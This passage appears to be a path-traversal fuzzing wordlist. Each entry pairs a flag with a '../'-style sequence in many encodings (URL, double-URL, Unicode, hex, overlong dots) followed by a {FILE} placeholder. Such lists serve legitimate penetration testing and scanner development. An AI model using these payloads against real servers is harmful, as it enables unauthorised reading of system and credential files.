"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
